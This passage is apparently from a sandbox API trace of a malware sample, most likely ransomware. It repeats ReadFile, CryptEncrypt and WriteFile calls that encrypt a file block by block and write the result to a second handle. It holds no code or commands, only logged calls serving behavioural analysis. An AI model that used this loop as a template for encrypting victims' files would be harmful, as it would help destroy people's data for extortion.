nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.307] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.308] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.308] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.309] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.310] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.311] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.311] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.311] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.311] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.311] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.311] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.312] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.312] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.312] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.312] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.312] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.312] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.312] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.313] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.313] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 